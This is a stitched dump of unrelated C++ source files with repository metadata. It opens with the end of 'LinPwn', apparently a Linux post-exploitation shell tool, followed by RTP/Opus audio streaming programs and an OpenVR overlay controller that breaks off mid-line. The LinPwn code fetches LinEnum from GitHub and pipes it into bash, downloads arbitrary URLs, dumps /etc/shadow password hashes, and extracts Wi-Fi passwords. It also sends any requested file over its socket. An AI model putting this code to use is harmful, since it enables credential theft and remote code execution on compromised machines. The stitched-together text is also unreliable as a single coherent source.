std::string exits = "Type exit to return to LinPwn.\n"; char option[BUFFER]; write(sd(), contents.data(), contents.length()); write(sd(), exits.data(), exits.length()); for (;;) { write(sd(), read.data(), read.length()); green(); get_input(option); if (strncmp(option, "exit\0", 5) == 0) { break; } else { open_file(option); } } } void enumeration() { std::string error0 = "\x1b[33mIf LinEnum didnt run curl" " or wget may not be installed\n"; std::string error1 = "or you do not have internet access\n"; const char *curl = "curl https://raw.githubusercontent.com/" "rebootuser/LinEnum/master/LinEnum.sh 2>/dev/null | bash 2>/dev/null"; const char *wget = "wget -O - https://raw.githubusercontent.com/" "rebootuser/LinEnum/master/LinEnum.sh 2>/dev/null | bash 2>/dev/null"; if (check_curl) { system(curl); return; } else if (check_wget) { system(wget); return; } write(sd(), error0.data(), error0.length()); write(sd(), error1.data(), error1.length()); return; } void download() { std::string url = "\x1b[32mEnter the URL of the target " "file to download it\n"; std::string downloads = "\x1b[31m(LinPwn: Download) >"; std::string curl_error = "\x1b[33mCurl or Wget is not installed\n"; char *command = new char[BUFFER]; const char *curl = "curl "; const char *wget = "wget "; const char *errors = " 2>/dev/null"; char option[BUFFER]; if (check_curl) { strncat(command, curl, BUFFER); } else if (check_wget) { strncat(command, wget, BUFFER); } else { write(sd(), curl_error.data(), curl_error.length()); return; } write(sd(), url.data(), url.length()); write(sd(), downloads.data(), downloads.length()); green(); get_input(option); strncat(command, option, BUFFER); strncat(command, errors, BUFFER); system(command); delete[] command; } void wificredz() { system("cat /etc/NetworkManager/system-connections/*" " 2>/dev/null | grep -e 'ssid=' -e 'psk='"); } void hashdump() { system("cat /etc/shadow 2>/dev/null " "| grep -v '*' | grep -v '!'"); } private: std::string error = "\x1b[33m Cannot open file.\n"; FILE *check_curl = fopen("/usr/bin/curl", "rb"); FILE *check_wget = fopen("/usr/bin/wget", "rb"); void open_file(char *option) { FILE *file = fopen(option, "rb"); if (!file) { write(sd(), error.data(), error.length()); return; } fseek(file, 0, SEEK_END); int size = ftell(file); fseek(file, 0, SEEK_SET); char *filecontent = new char[size]; fread(filecontent, 1, size, file); filecontent[size] = '\0'; send(sd(), filecontent, size, 0); fclose(file); delete[] filecontent; } }; int handler() { Banner ban; Modules modules; std::string not_valid = "\x1b[33mNot a valid option\n"; char *option = new char[BUFFER]; get_input(option); std::string shell = "shell"; std::string read = "readfile"; std::string enumerate = "enumerate"; std::string module_list = "modules"; std::string download = "download"; std::string wificredz = "wificredz"; std::string hashdump = "hashdump"; std::string quit = "exit"; std::string clear = "clear"; std::string help ="help"; std::string banner = "banner"; std::string nothing = ""; if (option == shell) modules.shell(); else if (option == read) modules.read_file(); else if (option == enumerate) modules.enumeration(); else if (option == module_list) modules.list_modules(); else if (option == download) modules.download(); else if (option == wificredz) modules.wificredz(); else if (option == hashdump) modules.hashdump(); else if (option == quit) return 1; else if (option == clear) system("clear"); else if (option == help) help_menu(); else if (option == banner) ban.print_banner(); else if (option == nothing) return 0; else write(sd(), not_valid.data(), not_valid.length()); delete[] option; return 0; } void main_loop() { std::string linpwn = "\x1b[31m(LinPwn) >"; do { write(sd(), linpwn.data(), linpwn.length()); green(); } while (handler() != 1); } int main() { Banner ban; Connection connection; connection.connection_open(); ban.print_banner(); main_loop(); return 0; }
12,684
C++
.cc
425
25.432941
77
0.608289
Andromeda1957/LinPwn
36
12
0
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,180
TrixMicrophone.cpp
JorenSix_trix/src/TrixMicrophone.cpp
/******************************************/ /* RTPMicrophone.cpp by Joren Six, 2018 This program records audio from a sound device, encodes the audio using the Opus encoder and sends it over an RTP session to a configured host. */ /******************************************/ #include "RtAudio.h" #include <iostream> #include <cstdlib> #include <cstring> #include <stdio.h> #include <ortp/ortp.h> #include <opus/opus.h> // uncomment to disable assert() // #define NDEBUG #include <cassert> /*Defines the rtAudio type, request 32bit floats*/ #define FORMAT RTAUDIO_FLOAT32 // Default configuration int audio_sample_rate= 48000; int audio_channels = 2; int opus_bitrate = 112; int opus_frame_size = 2880; int udp_port = 5555; char const *udp_addr = "81.11.161.28"; int rtp_payload_type = 96; //the rtp session object RtpSession *session; // The opus encoder OpusEncoder *encoder; // The number of bytes per opus frame int bytes_per_frame; unsigned int sample_frame_time_stamp = 0; //FILE *test_fd; static RtpSession* create_rtp_send(const char *addr_desc, const int port){ RtpSession *session; session = rtp_session_new(RTP_SESSION_SENDONLY); assert(session != NULL); rtp_session_set_scheduling_mode(session, 0); rtp_session_set_blocking_mode(session, 0); rtp_session_set_connected_mode(session, FALSE); if (rtp_session_set_remote_addr(session, addr_desc, port) != 0) abort(); //use payload type 96 = dynamic payload type if (rtp_session_set_payload_type(session, rtp_payload_type) != 0) abort(); if (rtp_session_set_multicast_ttl(session, 16) != 0) abort(); return session; } void usage( void ) { // Error function in case of incorrect command-line // argument specifications std::cout << "\nuseage:rtp_microphone N fs <device>\n"; std::cout << " where N = number of channels,\n"; std::cout << " fs = the sample rate,\n"; std::cout << " device = optional device to use (default = 0),\n"; exit( 0 ); } // Interleaved buffers int input( void * /*outputBuffer*/, void *inputBuffer, unsigned int nBufferFrames, double /*streamTime*/, RtAudioStreamStatus /*status*/, void *data ){ unsigned char* packet; ssize_t packet_length_in_bytes = 0; //allocate a packet on the stack: max bytes = bytes per frame packet = ( unsigned char*) alloca(bytes_per_frame); /* Read from file */ //fseek(test_fd, sample_frame_time_stamp * sizeof( float ) * audio_channels , SEEK_SET); //fread(inputBuffer, audio_channels * sizeof( float ), opus_frame_size, test_fd); //The length of the encoded packet (in bytes) on success or a negative error code (see Error codes) on failure. packet_length_in_bytes = opus_encode_float(encoder, (const float*) inputBuffer, opus_frame_size, packet, bytes_per_frame); if (packet_length_in_bytes < 0) { fprintf(stderr, "opus_encode_float: %s\n", opus_strerror(packet_length_in_bytes)); return -1; } rtp_session_send_with_ts(session, packet , packet_length_in_bytes, sample_frame_time_stamp); //increment sample frame counter sample_frame_time_stamp = sample_frame_time_stamp + opus_frame_size; std::cout << sample_frame_time_stamp <<"\n"; return 0; } int main( int argc, char *argv[] ) { unsigned int device = 0; // minimal command-line checking if ( argc < 3 || argc > 6 ) usage(); RtAudio adc; if ( adc.getDeviceCount() < 1 ) { std::cout << "\nNo audio devices found!\n"; exit( 1 ); } audio_channels = (unsigned int) atoi( argv[1] ); audio_sample_rate = (unsigned int) atoi( argv[2] ); if ( argc > 3 ) device = (unsigned int) atoi( argv[3] ); // Let RtAudio print messages to stderr. adc.showWarnings( true ); // Set our stream parameters for input only. RtAudio::StreamParameters iParams; if ( device == 0 ) iParams.deviceId = adc.getDefaultInputDevice(); else iParams.deviceId = device; iParams.nChannels = audio_channels; iParams.firstChannel = 0; RtAudio::StreamOptions options; options.streamName = "AudioToRTP"; options.numberOfBuffers = 0; // Use default. options.flags = RTAUDIO_SCHEDULE_REALTIME; options.priority = 70; options.flags |= RTAUDIO_MINIMIZE_LATENCY; char const *addr = udp_addr; int port = udp_port; ortp_init(); ortp_scheduler_init(); //ortp_set_log_level_mask(ORTP_WARNING|ORTP_ERROR); session = create_rtp_send(addr, port); assert(session != NULL); int encoder_error; encoder = opus_encoder_create(audio_sample_rate, audio_channels, OPUS_APPLICATION_AUDIO, &encoder_error); if (encoder == NULL) { fprintf(stderr, "opus_encoder_create: %s\n", opus_strerror(encoder_error)); return -1; } bytes_per_frame = opus_bitrate * 1024 * opus_frame_size / audio_sample_rate / 8; //test_fd = fopen( "waste_f_mono_48000.raw", "rb" ); unsigned int audio_block_size = 1 * opus_frame_size; try { adc.openStream( NULL, &iParams, FORMAT, audio_sample_rate, &audio_block_size, &input,&options); std::cout << audio_block_size << " internal buffer size in sample frames,\n"; std::cout << adc.getStreamLatency() << " Stream latency,\n"; } catch ( RtAudioError& e ) { std::cout << '\n' << e.getMessage() << '\n' << std::endl; goto cleanup; } try { adc.startStream(); } catch ( RtAudioError& e ) { std::cout << '\n' << e.getMessage() << '\n' << std::endl; goto cleanup; } while ( adc.isStreamRunning() ) { sleep( 100 ); // wake every 100 ms to check if we're done } rtp_session_destroy(session); ortp_exit(); ortp_global_stats_display(); opus_encoder_destroy(encoder); cleanup: if ( adc.isStreamOpen() ) adc.closeStream(); return 0; }
5,704
C++
.cpp
156
33.352564
124
0.681661
JorenSix/trix
32
2
3
GPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,181
TrixSpeaker.cpp
JorenSix_trix/src/TrixSpeaker.cpp
/******************************************/ /* RTPSpeaker.cpp by Joren Six, 2018 This program decodes Opus encoded audio from an RTP stream. The audio is immediately send to a sound device. */ /******************************************/ #include "RtAudio.h" #include <iostream> #include <cstdlib> #include <cstring> #include <stdio.h> #include <sys/time.h> #include <ortp/ortp.h> #include <opus/opus.h> // uncomment to disable assert() // #define NDEBUG #include <cassert> /*Defines the rtAudio type, request 32bit floats*/ #define FORMAT RTAUDIO_FLOAT32 #define SCALE 1.0; // Default configuration int audio_sample_rate= 48000; int audio_channels = 2; int opus_bitrate = 112; int opus_frame_size = 2880; int udp_port = 5555; char const *udp_addr = "0.0.0.0"; int rtp_payload_type = 96; unsigned int rtp_jitter = 16; OpusDecoder *decoder; RtpSession *session; const int buffer_length = 10; uint8_t packet_buffer[buffer_length][7000] ; int packet_lengths[buffer_length] ; int packet_write_index = -1; int packet_read_index = -1; void usage( void ) { // Error function in case of incorrect command-line // argument specifications std::cout << "\nuseage: N fs file <device>\n"; std::cout << " where N = number of channels,\n"; std::cout << " fs = the sample rate, \n"; std::cout << " device = optional device to use (default = 0),\n"; exit( 0 ); } static void timestamp_jump(RtpSession *session, ...) { rtp_session_resync(session); } static RtpSession* create_rtp_recv(const char *addr_desc, const int port, unsigned int jitter){ RtpSession *session; session = rtp_session_new(RTP_SESSION_RECVONLY); rtp_session_set_scheduling_mode(session, TRUE); rtp_session_set_blocking_mode(session, FALSE); rtp_session_set_local_addr(session, addr_desc, port, -1); rtp_session_set_connected_mode(session, FALSE); rtp_session_enable_adaptive_jitter_compensation(session, TRUE); rtp_session_set_jitter_compensation(session, jitter); /* ms */ rtp_session_set_time_jump_limit(session, jitter * 16); /* ms */ if (rtp_session_set_payload_type(session, rtp_payload_type) != 0) abort(); if (rtp_session_signal_connect(session, "timestamp_jump", (RtpCallback) timestamp_jump, 0) != 0) abort(); return session; } char buf[32768*2]; uint8_t packet[7000]; int ts = 0; // Interleaved buffers int output( void *outputBuffer, void * /*inputBuffer*/, unsigned int nBufferFrames, double /*streamTime*/, RtAudioStreamStatus /*status*/, void *data ){ int samples; samples = opus_frame_size; int r; packet_read_index++; packet_read_index = packet_read_index % buffer_length; if (packet_read_index == packet_write_index) { packet_read_index --; r = opus_decode_float(decoder, NULL, 0, (float*)outputBuffer, samples, 1); std::cout << r << " NULL audio sample frames decoded! " << ts << " ts\n"; } else { int len = packet_lengths[packet_read_index]; for(int i = 0 ; i <len ; i++){ packet[i] = packet_buffer[packet_read_index][i]; } r = opus_decode_float(decoder, (const unsigned char*) packet, len, (float*) outputBuffer, samples, 0); std::cout << r << " audio sample frames decoded! " << ts << " ts\n"; } if (r < 0) { fprintf(stderr, "opus_decode: %s\n", opus_strerror(r)); return -1; } return 0; } int main( int argc, char *argv[] ) { unsigned int bufferFrames, device = 0; int decoder_error; decoder = opus_decoder_create(audio_sample_rate, audio_channels, &decoder_error); if (decoder == NULL) { fprintf(stderr, "opus_decoder_create: %s\n",opus_strerror(decoder_error)); return -1; } ortp_init(); ortp_scheduler_init(); session = create_rtp_recv(udp_addr, udp_port, rtp_jitter); assert(session != NULL); // minimal command-line checking if ( argc < 4 || argc > 6 ){ usage(); } RtAudio dac; if ( dac.getDeviceCount() < 1 ) { std::cout << "\nNo audio devices found!\n"; exit( 0 ); } audio_channels = (unsigned int) atoi( argv[1]) ; audio_sample_rate = (unsigned int) atoi( argv[2] ); if ( argc > 3 ){ device = (unsigned int) atoi( argv[3] ); } // Set our stream parameters for output only. bufferFrames = opus_frame_size; RtAudio::StreamParameters oParams; oParams.deviceId = device; oParams.nChannels = audio_channels; if ( device == 0 ){ oParams.deviceId = dac.getDefaultOutputDevice(); } RtAudio::StreamOptions options; options.streamName = "AudioToRTP"; options.numberOfBuffers = 0; // Use default. options.flags = RTAUDIO_SCHEDULE_REALTIME; options.priority = 70; std::cout <<" Waiting for messages\n"; /* float *pcm; pcm = (float*) alloca(sizeof(float) * samples * audio_channels); */ bool started = false; for (;;) { int r, have_more; ts += opus_frame_size; r = rtp_session_recv_with_ts(session, (uint8_t*)buf, sizeof(buf), ts, &have_more); assert(r >= 0); assert(have_more == 0); if(r>0) std::cout << r << " bytes recieved! " << ts << " ts\n"; if(have_more>0) std::cout << have_more << " has more recieved! " << ts << " ts\n"; if (r != 0) { packet_write_index++; packet_write_index = packet_write_index % buffer_length; std::cout << packet_write_index << " packet_write_index " << packet_read_index << " read index \n"; if(!started && packet_write_index == buffer_length/2){ try { dac.openStream( &oParams, NULL, FORMAT, audio_sample_rate, &bufferFrames, &output, &options ); dac.startStream(); } catch ( RtAudioError& e ) { std::cout << '\n' << e.getMessage() << '\n' << std::endl; goto cleanup; } started = true; } for(int i = 0 ; i < r ; i++){ packet_buffer[packet_write_index][i] = buf[i]; } packet_lengths[packet_write_index] = r; } } cleanup: dac.closeStream(); rtp_session_destroy(session); ortp_exit(); ortp_global_stats_display(); return 0; }
6,042
C++
.cpp
180
29.827778
111
0.647444
JorenSix/trix
32
2
3
GPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,182
TrixList.cpp
JorenSix_trix/src/TrixList.cpp
// probe.cpp #include <iostream> #include "RtAudio.h" int main() { RtAudio *audio = 0; // Default RtAudio constructor try { audio = new RtAudio(); } catch (RtAudioError &error) { error.printMessage(); exit(EXIT_FAILURE); } // Determine the number of devices available int devices = audio->getDeviceCount(); // Scan through devices for various capabilities RtAudio::DeviceInfo info; for (int i=0; i<devices; i++) { try { info = audio->getDeviceInfo(i); } catch (RtAudioError &error) { error.printMessage(); break; } // Print, for example, the maximum number of output channels for each device std::cout << "device = " << i; std::cout << ": name = " << info.name; std::cout << ": maximum input channels = " << info.inputChannels; std::cout << ": maximum output channels = " << info.outputChannels << "\n"; } // Clean up delete audio; return 0; }
948
C++
.cpp
36
22.444444
80
0.638274
JorenSix/trix
32
2
3
GPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,183
TrixStreamer.cpp
JorenSix_trix/src/TrixStreamer.cpp
/******************************************/ /* RTPMicrophone.cpp by Joren Six, 2018 This program streams audio from a file, encodes the audio using the Opus encoder and sends it over an RTP session to a configured host. */ /******************************************/ #include "RtAudio.h" #include <iostream> #include <cstdlib> #include <cstring> #include <stdio.h> #include <ortp/ortp.h> #include <opus/opus.h> // uncomment to disable assert() // #define NDEBUG #include <cassert> /*Defines the rtAudio type, request 32bit floats*/ #define FORMAT RTAUDIO_FLOAT32 // Default configuration int audio_sample_rate= 48000; int audio_channels = 2; int opus_bitrate = 112; int opus_frame_size = 2880; int udp_port = 5555; char const *udp_addr = "127.0.0.1"; int rtp_payload_type = 96; //the rtp session object RtpSession *session; // The opus encoder OpusEncoder *encoder; // The number of bytes per opus frame int bytes_per_frame; unsigned int sample_frame_time_stamp = 0; FILE *test_fd; static RtpSession* create_rtp_send(const char *addr_desc, const int port){ RtpSession *session; session = rtp_session_new(RTP_SESSION_SENDONLY); assert(session != NULL); rtp_session_set_scheduling_mode(session, 0); rtp_session_set_blocking_mode(session, 0); rtp_session_set_connected_mode(session, FALSE); if (rtp_session_set_remote_addr(session, addr_desc, port) != 0) abort(); //use payload type 96 = dynamic payload type if (rtp_session_set_payload_type(session, rtp_payload_type) != 0) abort(); if (rtp_session_set_multicast_ttl(session, 16) != 0) abort(); return session; } void usage( void ) { // Error function in case of incorrect command-line // argument specifications std::cout << "\nSends the contents of '48000Hz_stereo_sound_long.raw' over \n"; std::cout << "An RTP connection to 127.0.0.1\n"; std::cout << "\nUseage: N fs\n"; std::cout << " where N = number of channels (2),\n"; std::cout << " fs = the sample rate (48000),\n"; exit( 0 ); } // Interleaved buffers int input( void * /*outputBuffer*/, void * inputBuffer , unsigned int nBufferFrames, double /*streamTime*/, RtAudioStreamStatus /*status*/, void *data ){ unsigned char* packet; ssize_t packet_length_in_bytes = 0; //allocate a packet on the stack: max bytes = bytes per frame packet = ( unsigned char*) alloca(bytes_per_frame); /* Read from file */ fseek(test_fd, sample_frame_time_stamp * sizeof( float ) * audio_channels , SEEK_SET); fread(inputBuffer, audio_channels * sizeof( float ), opus_frame_size, test_fd); //The length of the encoded packet (in bytes) on success or a negative error code (see Error codes) on failure. packet_length_in_bytes = opus_encode_float(encoder, (const float*) inputBuffer, opus_frame_size, packet, bytes_per_frame); if (packet_length_in_bytes < 0) { fprintf(stderr, "opus_encode_float: %s\n", opus_strerror(packet_length_in_bytes)); return -1; } rtp_session_send_with_ts(session, packet , packet_length_in_bytes, sample_frame_time_stamp); //increment sample frame counter sample_frame_time_stamp = sample_frame_time_stamp + opus_frame_size; std::cout << sample_frame_time_stamp <<"\n"; return 0; } int main( int argc, char *argv[] ) { unsigned int device = 0; // minimal command-line checking if ( argc < 3 || argc > 6 ) usage(); RtAudio adc; if ( adc.getDeviceCount() < 1 ) { std::cout << "\nNo audio devices found!\n"; exit( 1 ); } audio_channels = (unsigned int) atoi( argv[1] ); audio_sample_rate = (unsigned int) atoi( argv[2] ); if ( argc > 3 ) device = (unsigned int) atoi( argv[3] ); // Let RtAudio print messages to stderr. adc.showWarnings( true ); // Set our stream parameters for input only. RtAudio::StreamParameters iParams; if ( device == 0 ) iParams.deviceId = adc.getDefaultInputDevice(); else iParams.deviceId = device; iParams.nChannels = audio_channels; iParams.firstChannel = 0; RtAudio::StreamOptions options; options.streamName = "AudioToRTP"; options.numberOfBuffers = 0; // Use default. options.flags = RTAUDIO_SCHEDULE_REALTIME; options.priority = 70; options.flags |= RTAUDIO_MINIMIZE_LATENCY; char const *addr = udp_addr; int port = udp_port; ortp_init(); ortp_scheduler_init(); //ortp_set_log_level_mask(ORTP_WARNING|ORTP_ERROR); session = create_rtp_send(addr, port); assert(session != NULL); int encoder_error; encoder = opus_encoder_create(audio_sample_rate, audio_channels, OPUS_APPLICATION_AUDIO, &encoder_error); if (encoder == NULL) { fprintf(stderr, "opus_encoder_create: %s\n", opus_strerror(encoder_error)); return -1; } bytes_per_frame = opus_bitrate * 1024 * opus_frame_size / audio_sample_rate / 8; test_fd = fopen( "48000Hz_stereo_sound_long.raw", "rb" ); unsigned int audio_block_size = 1 * opus_frame_size; try { adc.openStream( NULL, &iParams, FORMAT, audio_sample_rate, &audio_block_size, &input,&options); std::cout << audio_block_size << " internal buffer size in sample frames,\n"; std::cout << adc.getStreamLatency() << " Stream latency,\n"; } catch ( RtAudioError& e ) { std::cout << '\n' << e.getMessage() << '\n' << std::endl; goto cleanup; } try { adc.startStream(); } catch ( RtAudioError& e ) { std::cout << '\n' << e.getMessage() << '\n' << std::endl; goto cleanup; } while ( adc.isStreamRunning() ) { sleep( 100 ); // wake every 100 ms to check if we're done } rtp_session_destroy(session); ortp_exit(); ortp_global_stats_display(); opus_encoder_destroy(encoder); cleanup: if ( adc.isStreamOpen() ) adc.closeStream(); return 0; }
5,747
C++
.cpp
157
33.382166
124
0.681909
JorenSix/trix
32
2
3
GPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,185
overlaycontroller.cpp
openvrmc_OpenVR-MotionCompensation/client_overlay/src/overlaycontroller.cpp
#include "overlaycontroller.h" //#include <QOpenGLFramebufferObjectFormat>// //#include <QOpenGLPaintDevice>// //#include <QPainter>// //#include <QQuickView>// #include <QApplication> #include <QQmlEngine> #include <QQmlContext> #include <QOpenGLExtraFunctions> #include <QMessageBox> #include <exception> #include <iostream> #include <cmath> #include <openvr.h> #include "logging.h" #include <vrmotioncompensation_types.h> #include <ipc_protocol.h> #include <codecvt> #include "openvr_math.h" // application namespace namespace motioncompensation { std::unique_ptr<OverlayController> OverlayController::singleton; QSettings* OverlayController::_appSettings = nullptr; OverlayController::~OverlayController() { Shutdown(); } void OverlayController::Init(QQmlEngine* qmlEngine) { // Loading the OpenVR Runtime auto initError = vr::VRInitError_None; vr::VR_Init(&initError, vr::VRApplication_Overlay); if (initError != vr::VRInitError_None) { if (initError == vr::VRInitError_Init_HmdNotFound || initError == vr::VRInitError_Init_HmdNotFoundPresenceFailed) { QMessageBox::critical(nullptr, "OpenVR Motion Compensation Overlay", "Could not find HMD!"); } throw std::runtime_error(std::string("Failed to initialize OpenVR: ") + std::string(vr::VR_GetVRInitErrorAsEnglishDescription(initError))); } LOG(INFO) << "OpenVR Motion Compensation Version: " << applicationVersionString; static char rchBuffer[1024]; uint32_t unRequiredSize; std::cout << vr::VR_GetRuntimePath(rchBuffer, sizeof(rchBuffer), &unRequiredSize); m_runtimePathUrl = QUrl::fromLocalFile(rchBuffer); LOG(INFO) << "VR Runtime Path: " << m_runtimePathUrl.toLocalFile(); LOG(INFO) << "sizeof(ipc::Request) = " << sizeof(vrmotioncompensation::ipc::Request); LOG(INFO) << "sizeof(ipc::Request::msg) = " << sizeof(vrmotioncompensation::ipc::Request::msg); LOG(INFO) << "sizeof(ipc::Reply) = " << sizeof(vrmotioncompensation::ipc::Reply); LOG(INFO) << "sizeof(ipc::Reply::msg) = " << sizeof(vrmotioncompensation::ipc::Reply::msg); QString activationSoundFile = m_runtimePathUrl.toLocalFile().append("/content/panorama/sounds/activation.wav"); QFileInfo activationSoundFileInfo(activationSoundFile); if (activationSoundFileInfo.exists() && activationSoundFileInfo.isFile()) { activationSoundEffect.setSource(QUrl::fromLocalFile(activationSoundFile)); activationSoundEffect.setVolume(1.0); } else { LOG(ERROR) << "Could not find activation sound file " << activationSoundFile; } QString focusChangedSoundFile = m_runtimePathUrl.toLocalFile().append("/content/panorama/sounds/focus_change.wav"); QFileInfo focusChangedSoundFileInfo(focusChangedSoundFile); if (focusChangedSoundFileInfo.exists() && focusChangedSoundFileInfo.isFile()) { focusChangedSoundEffect.setSource(QUrl::fromLocalFile(focusChangedSoundFile)); focusChangedSoundEffect.setVolume(1.0); } else { LOG(ERROR) << "Could not find focus changed sound file " << focusChangedSoundFile; } // Check whether OpenVR is too outdated if (!vr::VR_IsInterfaceVersionValid(vr::IVRSystem_Version)) { QMessageBox::critical(nullptr, "OpenVR Motion Compensation Overlay", "OpenVR version is too outdated. Please update OpenVR."); throw std::runtime_error(std::string("OpenVR version is too outdated: Interface version ") + std::string(vr::IVRSystem_Version) + std::string(" not found.")); } else if (!vr::VR_IsInterfaceVersionValid(vr::IVRSettings_Version)) { QMessageBox::critical(nullptr, "OpenVR Motion Compensation Overlay", "OpenVR version is too outdated. Please update OpenVR."); throw std::runtime_error(std::string("OpenVR version is too outdated: Interface version ") + std::string(vr::IVRSettings_Version) + std::string(" not found.")); } else if (!vr::VR_IsInterfaceVersionValid(vr::IVROverlay_Version)) { QMessageBox::critical(nullptr, "OpenVR Motion Compensation Overlay", "OpenVR version is too outdated. Please update OpenVR."); throw std::runtime_error(std::string("OpenVR version is too outdated: Interface version ") + std::string(vr::IVROverlay_Version) + std::string(" not found.")); } else if (!vr::VR_IsInterfaceVersionValid(vr::IVRApplications_Version)) { QMessageBox::critical(nullptr, "OpenVR Motion Compensation Overlay", "OpenVR version is too outdated. Please update OpenVR."); throw std::runtime_error(std::string("OpenVR version is too outdated: Interface version ") + std::string(vr::IVRApplications_Version) + std::string(" not found.")); } else if (!vr::VR_IsInterfaceVersionValid(vr::IVRChaperone_Version)) { QMessageBox::critical(nullptr, "OpenVR Motion Compensation Overlay", "OpenVR version is too outdated. Please update OpenVR."); throw std::runtime_error(std::string("OpenVR version is too outdated: Interface version ") + std::string(vr::IVRChaperone_Version) + std::string(" not found.")); } else if (!vr::VR_IsInterfaceVersionValid(vr::IVRChaperoneSetup_Version)) { QMessageBox::critical(nullptr, "OpenVR Motion Compensation Overlay", "OpenVR version is too outdated. Please update OpenVR."); throw std::runtime_error(std::string("OpenVR version is too outdated: Interface version ") + std::string(vr::IVRChaperoneSetup_Version) + std::string(" not found.")); } else if (!vr::VR_IsInterfaceVersionValid(vr::IVRCompositor_Version)) { QMessageBox::critical(nullptr, "OpenVR Motion Compensation Overlay", "OpenVR version is too outdated. Please update OpenVR."); throw std::runtime_error(std::string("OpenVR version is too outdated: Interface version ") + std::string(vr::IVRCompositor_Version) + std::string(" not found.")); } else if (!vr::VR_IsInterfaceVersionValid(vr::IVRNotifications_Version)) { QMessageBox::critical(nullptr, "OpenVR Motion Compensation Overlay", "OpenVR version is too outdated. Please update OpenVR."); throw std::runtime_error(std::string("OpenVR version is too outdated: Interface version ") + std::string(vr::IVRNotifications_Version) + std::string(" not found.")); } QSurfaceFormat format; // Qt's QOpenGLPaintDevice is not compatible with OpenGL versions >= 3.0 // NVIDIA does not care, but unfortunately AMD does // Are subtle changes to the semantics of OpenGL functions actually covered by the compatibility profile, // and this is an AMD bug? format.setVersion(2, 1); format.setDepthBufferSize(16); format.setStencilBufferSize(8); format.setSamples(16); m_pOpenGLContext.reset(new QOpenGLContext()); m_pOpenGLContext->setFormat(format); if (!m_pOpenGLContext->create()) { throw std::runtime_error("Could not create OpenGL context"); } // create an offscreen surface to attach the context and FBO to m_pOffscreenSurface.reset(new QOffscreenSurface()); m_pOffscreenSurface->setFormat(m_pOpenGLContext->format()); m_pOffscreenSurface->create(); m_pOpenGLContext->makeCurrent(m_pOffscreenSurface.get()); if (!vr::VROverlay()) { QMessageBox::critical(nullptr, "OpenVR Motion Compensation Overlay", "Is OpenVR running?"); throw std::runtime_error(std::string("No Overlay interface")); } // Init controllers deviceManipulationTabController.initStage1(); // Set qml context qmlEngine->rootContext()->setContextProperty("applicationVersion", getVersionString()); qmlEngine->rootContext()->setContextProperty("vrRuntimePath", getVRRuntimePathUrl()); // Register qml singletons qmlRegisterSingletonType<OverlayController>("ovrmc.motioncompensation", 1, 0, "OverlayController", [](QQmlEngine*, QJSEngine*) { QObject* obj = getInstance(); QQmlEngine::setObjectOwnership(obj, QQmlEngine::CppOwnership); return obj; }); qmlRegisterSingletonType<DeviceManipulationTabController>("ovrmc.motioncompensation", 1, 0, "DeviceManipulationTabController", [](QQmlEngine*, QJSEngine*) { QObject* obj = &getInstance()->deviceManipulationTabController; QQmlEngine::setObjectOwnership(obj, QQmlEngine::CppOwnership); return obj; }); } void OverlayController::Shutdown() { if (m_pPumpEventsTimer) { disconnect(m_pPumpEventsTimer.get(), SIGNAL(timeout()), this, SLOT(OnTimeoutPumpEvents())); m_pPumpEventsTimer->stop(); m_pPumpEventsTimer.reset(); } if (m_pRenderTimer) { disconnect(m_pRenderControl.get(), SIGNAL(renderRequested()), this, SLOT(OnRenderRequest())); disconnect(m_pRenderControl.get(), SIGNAL(sceneChanged()), this, SLOT(OnRenderRequest())); disconnect(m_pRenderTimer.get(), SIGNAL(timeout()), this, SLOT(renderOverlay())); m_pRenderTimer->stop(); m_pRenderTimer.reset(); } m_pWindow.reset(); m_pRenderControl.reset(); m_pFbo.reset(); m_pOpenGLContext.reset(); m_pOffscreenSurface.reset(); } void OverlayController::SetWidget(QQuickItem* quickItem, const std::string& name, const std::string& key) { if (!desktopMode) { vr::VROverlayError overlayError = vr::VROverlay()->CreateDashboardOverlay(key.c_str(), name.c_str(), &m_ulOverlayHandle, &m_ulOverlayThumbnailHandle); if (overlayError != vr::VROverlayError_None) { if (overlayError == vr::VROverlayError_KeyInUse) { QMessageBox::critical(nullptr, "OpenVR Motion Compensation Overlay", "Another instance is already running."); } throw std::runtime_error(std::string("Failed to create Overlay: " + std::string(vr::VROverlay()->GetOverlayErrorNameFromEnum(overlayError)))); } vr::VROverlay()->SetOverlayWidthInMeters(m_ulOverlayHandle, 2.5f); vr::VROverlay()->SetOverlayInputMethod(m_ulOverlayHandle, vr::VROverlayInputMethod_Mouse); vr::VROverlay()->SetOverlayFlag(m_ulOverlayHandle, vr::VROverlayFlags_SendVRSmoothScrollEvents, true); std::string thumbIconPath = QApplication::applicationDirPath().toStdString() + "\\res\\thumbicon.png"; if (QFile::exists(QString::fromStdString(thumbIconPath))) { vr::VROverlay()->SetOverlayFromFile(m_ulOverlayThumbnailHandle, thumbIconPath.c_str()); } else { LOG(ERROR) << "Could not find thumbnail icon \"" << thumbIconPath << "\""; } // Too many render calls in too short time overwhelm Qt and an assertion gets thrown. // Therefore we use an timer to delay render calls m_pRenderTimer.reset(new QTimer()); m_pRenderTimer->setSingleShot(true); m_pRenderTimer->setInterval(5); connect(m_pRenderTimer.get(), SIGNAL(timeout()), this, SLOT(renderOverlay())); QOpenGLFramebufferObjectFormat fboFormat; fboFormat.setAttachment(QOpenGLFramebufferObject::CombinedDepthStencil); fboFormat.setTextureTarget(GL_TEXTURE_2D); m_pFbo.reset(new QOpenGLFramebufferObject(quickItem->width(), quickItem->height(), fboFormat)); m_pRenderControl.reset(new QQuickRenderControl()); m_pWindow.reset(new QQuickWindow(m_pRenderControl.get())); m_pWindow->setRenderTarget(m_pFbo.get()); quickItem->setParentItem(m_pWindow->contentItem()); m_pWindow->setGeometry(0, 0, quickItem->width(), quickItem->height()); m_pRenderControl->initialize(m_pOpenGLContext.get()); vr::HmdVector2_t vecWindowSize = { (float)quickItem->width(), (float)quickItem->height() }; vr::VROverlay()->SetOverlayMouseScale(m_ulOverlayHandle, &vecWindowSize); connect(m_pRenderControl.get(), SIGNAL(renderRequested()), this, SLOT(OnRenderRequest())); connect(m_pRenderControl.get(), 